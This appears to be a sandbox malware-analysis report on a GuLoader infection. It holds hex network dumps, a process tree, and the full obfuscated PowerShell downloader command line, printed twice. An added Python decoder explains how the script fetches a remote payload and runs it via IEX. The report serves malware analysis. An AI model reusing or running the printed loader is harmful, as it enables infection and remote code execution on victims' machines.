                                                                                                      Data Ascii: 0j1U=%'~A$|fux?o'D/@^so4]?z*zIpFxr>!\8]KePny5/l mEw8(<<wo8FHe<f<un>zLt;3 (/9xboL$o^&={^Jzv
                                                                                                      2024-10-17 13:03:35 UTC1369INData Raw: 96 3f 93 d3 cf 3b 69 d2 e9 73 85 77 1e ee ad 5a 08 31 da 23 ff 97 aa 7d 77 cd 57 6e 77 fd 09 dc 62 86 a0 bb e8 56 01 de 42 b9 2b f3 bc 57 12 11 c5 30 2b c4 2f 3e 01 29 a6 80 e2 cc 82 b7 4c 5d b4 22 51 3b cc 8e 19 ac 45 d7 ca f7 74 2c 83 65 06 e9 03 09 26 d7 55 3b d3 7e c3 5e 90 99 e9 5a 36 55 bc 02 ef 90 bc c7 c4 84 3f d1 e2 54 e9 b5 8e 6a 42 34 42 2b 2a 4d c3 19 ee 18 b0 f4 c9 a4 24 e6 06 f8 f3 26 78 54 05 96 a3 d4 ef 7a ac e9 9c 52 a6 43 2f 86 c3 4e 35 58 22 76 15 84 83 05 ff 6d ac 58 75 85 c2 72 01 5d af bc ed 7d 13 03 e1 cf 31 b1 3b 83 03 c1 8d fe 3b f6 b4 bb b6 25 81 f9 d4 a9 da cd 1d d9 ab 6a 23 5f f5 5c 9c 5c 98 bc f8 64 ef a3 59 2a 8b 2c 40 0b 44 45 84 c2 68 3e c9 21 7a 3b 6a d7 77 18 3e 65 6d 57 c3 93 82 0c 1c af c4 75 b7 52 69 11 cc e4 ea dd 2b
                                                                                                      Data Ascii: ?;iswZ1#}wWnwbVB+W0+/>)L]"Q;Et,e&U;~^Z6U?TjB4B+*M$&xTzRC/N5X"vmXur]}1;;%j#_\\dY*,@DEh>!z;jw>emWuRi+
                                                                                                      2024-10-17 13:03:35 UTC1369INData Raw: a6 3d a9 b8 2a a7 3c 3c 63 45 21 c4 d5 e7 f2 b2 c1 c3 28 e9 4d 7c 66 34 3d 2b 0f 3c 0a a5 da 34 eb 31 b9 4c b3 10 4a 6a 04 1c 2c 75 2c 1f bc e4 85 64 af 83 a3 a7 ae c6 ac 49 35 45 fb fd b9 bd e0 8a 8f 1f 43 82 24 56 be 5f cc 18 c3 98 d3 a9 92 05 9d 7e d2 c3 33 f7 5e 92 c0 7e a9 ab eb b4 f0 f6 f9 f8 7e ac 12 c3 38 ab e3 d3 ff c3 92 87 65 bf 48 ac 96 60 50 26 fd 6b 0e 8b 75 2e b2 7c a7 c7 61 56 8f 62 cd b5 59 e4 ca 2e 65 55 d6 2b 50 ae 94 7e 17 b4 67 02 31 c2 00 08 c3 a0 3e a0 8e 17 f0 57 22 4f e2 93 59 03 47 6a d6 0e 02 38 24 db f2 07 6c 7e 60 a5 d6 c6 12 23 c8 4a a5 bd 09 c8 1a bc 8f 3b fd 22 c9 d9 48 95 6a 77 30 07 94 34 c0 c4 f5 15 21 c4 cd 5c 3c 22 43 15 31 46 d7 91 b9 fd eb 30 30 3d 1c d1 85 07 12 44 8f 11 d2 e6 2d af 06 3a 57 e3 6b 0c 55 46 11 a6 be
                                                                                                      Data Ascii: =*<<cE!(M|f4=+<41LJj,u,dI5EC$V_~3^~~8eH`P&ku.|aVbY.eU+P~g1>W"OYGj8$l~`#J;"Hjw04!\<"C1F00=D-:WkUF
                                                                                                      2024-10-17 13:03:35 UTC1369INData Raw: 0d 83 ad 1a 3f 6f 3a 1d 65 e3 f0 dc ea 59 1c 1a 22 6f 7f 97 bc 8d 33 da bd a9 98 12 58 a8 0a 2a 45 21 c7 c4 e8 16 ca 9a 5b 15 16 d8 2d f7 a6 32 94 28 28 38 e5 d5 4f b2 02 9f 65 4b 7b f4 d4 6e a9 f1 44 21 7b ce 3a ff 3e 10 ec 1a 8b a8 cd 3f a1 f4 c4 a6 96 55 de 55 6b e7 9a 30 72 3d 07 28 2f d3 e0 41 48 fb 68 62 39 c7 d5 5b e2 fa 5e 26 23 8e d9 b4 06 05 b0 dd 6d 9e 49 16 95 fa a5 1b 53 61 b7 78 56 24 73 45 bf f9 dc 81 95 eb b9 1b 58 ab f6 0f 76 23 ff 27 1e b8 a1 6b 5a e2 0a b4 63 9f b8 94 95 d0 56 ee 6d d1 42 15 e2 de 74 bd 9b d2 26 8b 24 6c 48 5a 7c b7 a3 39 c0 ce de 06 12 01 6f ea 2e fb 72 c2 dc 8b a0 33 49 dd f4 3f 9f c8 9c 06 98 e9 89 81 60 b8 19 e6 41 aa e2 e8 72 c6 47 7c cf 63 e6 a4 9c a4 57 f1 a8 3f 10 54 08 b5 9d 4e c9 97 e9 d1 21 9e 33 cd 8e 80 22
                                                                                                      Data Ascii: ?o:eY"o3X*E![-2((8OeK{nD!{:>?UUk0r=(/AHhb9[^&#mISaxV$sEXv#'kZcVmBt&$lHZ|9o.r3I?`ArG|cW?TN!3"
                                                                                                      2024-10-17 13:03:35 UTC1369INData Raw: 0f df ad 80 df 26 35 3e 16 f8 cb fa 9d d5 a6 1e bd d2 8d e0 a5 ce 0e 9c 19 6d 19 cc cd 50 d4 97 ea 19 2b 8c af 13 21 ca e3 a6 07 30 2f d4 a6 d7 28 51 77 4c bc 61 4f 52 ec ba a8 be 0d 0a c3 ad e9 37 eb 29 5b fb ef 5d 26 ab 27 b7 fd cd 0a ee f7 e0 64 4a 1d 8a c6 d7 ba 59 20 a2 75 01 9c ab 95 bd 7e 67 92 53 66 67 c3 38 7f ba 4b 71 40 23 94 1f 96 a0 d6 10 81 68 56 e0 0e 7e 3b 54 21 07 29 6c de 43 c9 c3 93 db 44 7d 9c a9 22 c5 fe 03 91 02 0c db a7 55 87 b4 48 d2 33 a5 7f 3a 00 1e a0 5e 04 09 ab b0 8b 77 0e 12 1f 84 cd 7f 48 4b f5 e6 80 7f ad b8 c2 3b c2 50 e1 c0 f6 c7 33 a1 20 20 63 f5 14 d5 f8 92 b2 5d 69 ae 3e 76 9e 49 ce 9b b9 1c b3 09 3b 75 f0 20 b5 8b 7f 8c a5 3f 31 82 02 04 98 b8 45 21 67 55 c3 e9 95 23 6f 9d 81 48 40 e5 ff f9 b9 b3 4e 8d 5d 8b 46 b1 8d
                                                                                                      Data Ascii: &5>mP+!0/(QwLaOR7)[]&'dJY u~gSfg8Kq@#hV~;T!)lCD}"UH3:^wHK;P3 c]i>vI;u ?1E!gU#oH@N]F
                                                                                                      2024-10-17 13:03:35 UTC1369INData Raw: 96 7f b9 bc c3 4c 80 98 1f 61 44 1e cf c5 f9 3b 5a 3e 6b 94 37 e4 f7 3c 79 71 bd 18 35 6c 39 d2 99 ae 62 4c aa 29 28 88 eb e7 5a 1b ba 47 bc 19 8e ac 0a 7c ec 41 da 8a 17 a6 e8 4c a3 0a 6f 04 88 97 6c 2e 0e 92 b3 eb e0 dc 33 21 96 eb 02 a2 e9 a6 9f 9f d9 2e 72 e1 12 45 56 70 b0 6b 56 29 02 ec 28 0d 9f 1b f9 a6 b4 e5 6b 35 98 19 ff 06 4a a2 44 59 9e a7 25 14 e5 0a 26 4c 17 39 28 27 21 d3 15 59 58 c1 04 d2 3c d1 50 f9 5c 17 42 b5 91 69 16 9a 69 db da 72 9f 45 28 9e a8 a8 40 c3 e1 81 d9 2b 85 05 83 43 bd 55 00 14 82 4f aa 21 bb b4 4e bd 44 6e c5 fe 9a e5 0b ef eb 75 3a 51 7c f2 e9 ca 06 28 5b ab f7 b4 c1 9c 33 f5 a7 6e 77 27 be c7 27 b4 6a a8 ca 77 fb 11 96 ba c9 3e d8 00 76 2f 0c 83 f1 0a e6 0d ea 62 d0 81 22 54 41 7f 33 49 d9 c0 29 05 48 74 19 f7 53 2d 40
                                                                                                      Data Ascii: LaD;Z>k7<yq5l9bL)(ZG|ALol.3!.rEVpkV)(k5JDY%&L9('!YX<P\BiirE(@+CUO!NDnu:Q|([3nw''jw>v/b"TA3I)HtS-@
                                                                                                      2024-10-17 13:03:35 UTC1369INData Raw: c7 e5 ea ac 93 5c d9 dc fe f1 43 49 e3 ca 27 7f b8 5e 23 14 3e a9 b2 91 79 83 7a a1 db 96 8b 44 8d 10 41 7f 6f 51 28 4e f9 30 03 b4 93 b8 b0 45 b8 49 67 57 0f 14 e5 30 c9 b6 df f4 20 01 91 20 96 42 cf c4 2e e8 bf 9b 8b b5 67 d2 87 63 5a f8 77 6f b1 e9 01 28 c5 c8 c6 85 06 46 d6 72 c2 57 08 04 7e 5c 34 d8 66 14 06 1e 6e f0 eb 76 76 44 84 72 4b 5a aa 96 ad 3d 87 71 1c 46 04 e7 ce 9d 5b 7c 8b ff 5c 38 ee 35 4e 1e 33 9d 18 aa d1 71 08 ce 32 f1 29 a1 b3 79 11 8d 33 da 47 cf d2 ca 83 87 42 d4 11 1e 89 a7 92 10 36 13 d0 06 db 74 6c a1 7d 38 b7 d2 31 2a a1 e2 10 d3 2e ba 8c 3d 6b fd 99 16 f0 f4 e9 53 1e 52 d2 97 10 c6 30 7d 65 ad 81 a9 f3 d4 10 22 6e 30 72 5d 5e 53 b6 cf ec b4 af e0 8d f6 f2 41 28 72 15 a6 21 e6 9a 7a 36 ca 22 8e 99 b2 9e 92 64 af df 2b c3 06 8e
                                                                                                      Data Ascii: \CI'^#>yzDAoQ(N0EIgW0 B.gcZwo(FrW~\4fnvvDrKZ=qF[|\85N3q2)y3GB6tl}81*.=kSR0}e"n0r]^SA(r!z6"d+
                                                                                                      2024-10-17 13:03:35 UTC1369INData Raw: 65 34 ba a3 90 41 b6 6b bf bc d9 9d 83 6d b5 d2 9c 2a b8 33 02 43 c3 b1 c1 72 20 20 e4 97 50 c6 9e 17 9d a6 77 78 52 1a 47 e5 09 16 8e 7c 1c 35 27 df 67 f0 d2 62 b5 5f 28 bf c4 3d c3 9e 88 f1 37 80 98 01 f7 6f 4a 37 bb d0 c3 b5 44 cf 3b 6b 84 ae b0 59 d0 33 9e 37 98 72 72 cf 3e 9b ae cb 62 e2 06 09 ea c5 52 26 c6 0a b8 c7 ec 2b a4 3d f1 4a 23 5d 57 dd 90 e3 ba 76 2f 84 50 c2 cc 70 50 2a 1b cb e1 67 ce e2 54 67 f5 aa 21 51 e5 ec f9 53 9c d5 68 6a 84 2a 50 fd 43 12 68 f8 3f 2b 98 29 4d 86 12 38 69 48 f2 5e b0 37 ee 66 57 80 e1 9b b6 b7 b3 58 1c e6 e8 0f c6 05 f6 93 0b 5b 8f c3 2b af 08 21 bc 95 a3 36 17 bf 95 25 ca a3 6b dc 16 9b 32 9f ff b7 be 2b c9 42 7e ea 29 6f d1 7c 00 da df 8c 1e 07 aa 4d 89 ee 01 72 38 3d b1 82 41 15 65 40 d3 6b 81 3a f8 6b 84 ca 6f
                                                                                                      Data Ascii: e4Akm*3Cr PwxRG|5'gb_(=7oJ7D;kY37rr>bR&+=J#]Wv/PpP*gTg!QShj*PCh?+)M8iH^7fWX[+!6%k2+B~)o|Mr8=Ae@k:ko
                                                                                                      2024-10-17 13:03:35 UTC1369INData Raw: 11 a6 da 67 6e 27 d5 5c d2 ea bc ea eb 09 0b 4b ce ad e3 c4 c7 09 97 1f 34 38 76 f7 54 88 36 94 ae 74 09 f2 c2 4c 8d e7 a0 10 f9 fb da 35 8d cf ad 9a b5 08 58 3e 1a 34 0f f5 37 85 05 95 43 bd 9a 96 14 a0 4e 14 8b e2 b3 4e 12 27 13 10 8c 28 99 9e 68 a8 7d 2a 46 38 8b 66 25 b3 6b 2e 92 56 ec c5 dc db af 85 79 f7 91 18 66 60 da 36 a9 9b fc 42 19 07 35 b5 47 c0 f8 25 b2 19 7b 4e 0a b2 0a 9e d0 db 49 2e 4c f9 3a 77 6a d9 66 29 b7 b4 91 93 92 bc a7 39 6d 3e fb d2 a3 d4 9e d5 1f 5b 55 9a a4 85 bf 24 c5 6c c6 87 1d 4e 51 48 85 48 96 53 a6 cc 7b 38 3c 44 b4 42 1b ae 0f 48 c7 30 da 90 18 a0 65 57 62 e8 2e 27 69 4b 82 11 0e 2d d0 fe b0 72 68 a9 19 19 c6 07 eb 15 1a c3 db 5f 81 f2 58 55 ba 0b a5 1b 47 c4 dd cd 8b de 7b e2 b9 5d ea 27 b2 da 36 61 12 bb fd 9f 24 33 c5
                                                                                                      Data Ascii: gn'\K48vT6tL5X>47CNN'(h}*F8f%k.Vyf`6B5G%{NI.L:wjf)9m>[U$lNQHHS{8<DBH0eWb.'iK-rh_XUG{]'6a$3


                                                                                                      Target ID:0
                                                                                                      Start time:09:02:57
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rIMGTR657365756.bat" "
                                                                                                      Imagebase:0x7ff7cec30000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:1
                                                                                                      Start time:09:02:57
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:2
                                                                                                      Start time:09:02:57
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:powershell.exe -windowstyle hidden " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.take LnnaDan dPerfePapfrDeorsLerr[Adv $Tes,DVaesr rotiSvovkN nck IndeVensvLodsaPapin HjkdpsycsSpivfoffsoF rtrTerrsTortyPocknDemai,yttnthamg rodespu,rSter]Syll=ejer$ Br FobskuExporHon.cHypoa Nont.opieSyn d SedrOverr SneeTo.lfInterT esa.oldg lua FlabInteiPilklTareiAlt.tMis,y ogl ');$Gasartens60=Taborets 'Unfo$.luerFj leHimygSlvleGoallJe,nmaftesCrtosbilli Co gVulcsForlt Mad. TheDA tioKerawUdfrnFodblmi roSemiaYuked ,ycFUndeiBro lA.ioeV ks(Prin$Col ESci.n Klag D,ml eaneEs es DiskStena armrHklee gaarHidss Ace, Chi$ UpbUAcc dAquebBraclDephi fbkAr esRein) ald ';$Udbliks=$Thioneine;Politiseres (Taborets 'Reun$CampgSul.lSpitoCrabbPriva ExflMala:manuaDom,c RaahLus,r ,riOB,thMAntiA.eksT gotiKontNInvii HorcZo t= nc( kh,T ,tyeS leSQuattVa v-GldsPBrazaSkostfilthTran Bee$granUfacsdKokoBAlinl RafIE ickNot sSamm)Su a ');while (!$Achromatinic) {Politiseres (Taborets 'Meak$Kom gKalil ScroRemubYowla PrelGuar:BekrgR warF ise ForiEnd.t geo= Bun$WhamtCaferSolou anese v ') ;Politiseres $Gasartens60;Politiseres (Taborets 'QuivSKom tJohaA eflRDislTS nd-PrehsFoppLBarneQueseM,nipPama Reme4A ha ');Politiseres (Taborets 'Sand$ Ro Gkyp LCopro MatBHjlpA AnrLS dd:SynaAS,ilCResoh Na R L,sORakeMBen ABol t,lipIRe.anFjorI ubCbut,=.nch(En.lTCa.tETohesMel TMacr-DeplPShanAT,glT SnaHReup lu.k$SladuSprrd Samb,ammlMicrIF,enkFlusSRamp) ua ') ;Politiseres (Taborets 'A,sk$MomogDisal E ko DiaB BerANontL nge:agriiSkiemRethpCh llTi.beTur MFibrE MorNRegnTMuceaSadltKolliChroo AsyNEa lAmnstLLode= Sna$ VelGUndelDr tOBoonbIngeAIroklLy o:Snorn edtoP ckT Ga a TeltS.orE Afvs Ras+ dup+ cho%Fire$S arS KarARouttek ke rctLNo slKrybIAltsT,itabSardYeftee Af rIdeoNBjrne arpsTolv.OpsaCPi tOTok.USkamnIrreTPant ') ;$Engleskarers=$Satellitbyernes[$implementational];}$Budgettets=309680;$minification=29934;Politiseres (Taborets 'P el$ vergStuelChaeoMolabChr a utuLUsag:Semim ngeMilikP raA Sl N Ba IUnprK ritk SlueD gerBeclnK,ivEUngrsPa k Mou=Fed GratGMisoE udat Rus-ophtcUf eO ReanBaskTFilteVaquNHaentSved A fr$a rjuSa vdAtrib edeLEmbrIDummKBellS iva ');Politiseres (Taborets 'Togp$AfgigSt,klL kroF eebBillaDis l Not: erpAPodorAksecTrish uffaTypoe Bu oBa,dlPhen Afre= ska Re.u[Ba oSLgkuyindlsflurtSproeIntrmTr,n.TresCLegaoNifenMacuv etueSeksrIrontOutr]San :With:KonsFAirprResboTa km SciBRetraSpeasTy keim o6 Rst4ValuSAfsttNglerAdeliApnenNon g unk(Stre$U stmStane.rfakCerva ilbnSelviP aekSk ak ozee,cotrCentn BeveAftosSign) F.l ');Politiseres (Taborets ',ome$Zulkg T,klBi eoFdevBNds aUndeLFors:Dic.mP,edODe oR InctWedgAn,tuLombyWImpeIPredSUnfaE Re 1 Sub3Bilt3Anac sy b=Kloe Yeg [Pries AttyYellSBilltPhipeCarlm rat. ndeTS ane StaxHuskTProd.H,neESkulNPernCskaloCh iDExcrIS.mlnBeg.G.tje]Disl:perf:SyriA TenS eucc AriiPrgtiSpkh.Spu.GVa aeCabrT,iscs Am tNo pREv kIIschNP upg Fli( Fle$CeleAR.mor DiecDiplH othAUndeECa lOAndeLTele)A ch ');Politiseres (Taborets ',und$ KargJordl vaboEnsuBCahoaLastl Ima:HospCKd jOTracM Ch pSteaUIndet T,nEStalreg.sdmodvrSkifESiniV VokEUnimt Fol=A va$ ,enm T rO nscRSeksTNotiA stalF,stWDiptIFinhsAp ke ov1R od3U ha3 ies.BoetsMercuFinebP tasAndet KarR Lb ISk,dnUndeGKloe(Infr$ Fo b ProuleftdsmakGOvereB sttIdxlt N re ra,t Sn SA,fo,Cher$G,unmPhleI ovenBy liEl kFPr.fiUr gC.pacAScrutSoldi TiloThinNAfte)Fo r ');Politiseres $computerdrevet;"
                                                                                                      Imagebase:0x7ff7be880000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2234266355.000001DCBFB5D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:true
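The Taborets function in the Target 2 command line above is the string decoder for the whole script: each literal carries four junk characters in front of every plaintext character, and the loop reads offsets 4, 9, 14, ... up to the string length minus $Baljers. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it reimplements that decoder and runs it over three literals copied verbatim from the command line. The regular expression, the function names and the constructed SAMPLE string are mine. One caveat a practitioner needs: the page rendering has collapsed runs of spaces inside the literals, so many of them no longer align after the collapse point; the user-agent literal is included to show that failure mode rather than a clean result.

```python
"""
Decoder for the four-junk-chars-per-plaintext-char obfuscation visible in the
powershell.exe command line above (function Taborets). Added example; the
literals below are copied from the command line on this page.

PowerShell original, paraphrased:
    for( $i=4; $i -lt ($s.Length - $Baljers); $i+=5 ){ $out += $s[$i] }
"""
import re

# Call sites of the decoder: Taborets '...'. The literals never contain a quote.
LITERAL_RE = re.compile(r"Taborets\s+'([^']*)'")
# The literal whose decoded value is later invoked via `& ($Glassine) (...)`.
INVOKER_RE = re.compile(r"\$Glassine=Taborets\s+'([^']*)'")


def taborets_decode(blob: str, trim: int = 0) -> str:
    """Every 5th character from offset 4, stopping `trim` characters before the end.

    `trim` models $Baljers, which the script increments once per call while
    $host.UI is non-null (it is, in a normal console host). That only leaves
    the plaintext intact if each literal ends in enough padding; the padding
    on this page has been collapsed by rendering, so the examples use trim=0.
    """
    return "".join(blob[i] for i in range(4, len(blob) - trim, 5))


def decode_literals(script: str, trim: int = 0) -> list:
    """Decode every Taborets literal in `script`, in order of appearance."""
    return [taborets_decode(m.group(1), trim) for m in LITERAL_RE.finditer(script)]


def decoded_invoker(script: str) -> str:
    """Return the command name Politiseres() will call through $Glassine."""
    m = INVOKER_RE.search(script)
    return taborets_decode(m.group(1)).strip() if m else ""


# Constructed snippet assembled from three literals copied from the report.
SAMPLE = (
    "$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';"
    "$Genhret=Taborets ' ppe>Emer ';"
    "$Glassine=Taborets 'AarsI Ci,EPri.XKard ';"
)

# The user-agent literal exactly as it appears on this page. A run of spaces
# inside it was collapsed by the page rendering, so alignment is lost after the
# fifth character and the result is "MozilB M" instead of a clean string.
COLLAPSED_LITERAL = "UnmoM sphoLarrzEksai Udal knlBloda und/Magn "


if __name__ == "__main__":
    for decoded in decode_literals(SAMPLE):
        print(repr(decoded))            # 'uSer-AgeNt ', '> ', 'IEX '
    print("invoker:", decoded_invoker(SAMPLE))
    print("collapsed:", repr(taborets_decode(COLLAPSED_LITERAL)))
```

Decoding the header name, the redirection operator and the `IEX` invoker is enough to read the skeleton of the script from the Target 2 line: a web request with a custom User-Agent whose response is handed to Invoke-Expression. Literals containing a collapsed space run, like the user-agent string, must be taken from the original sample rather than from this page.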

                                                                                                      Target ID:3
                                                                                                      Start time:09:02:57
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:5
                                                                                                      Start time:09:03:13
                                                                                                      Start date:17/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres 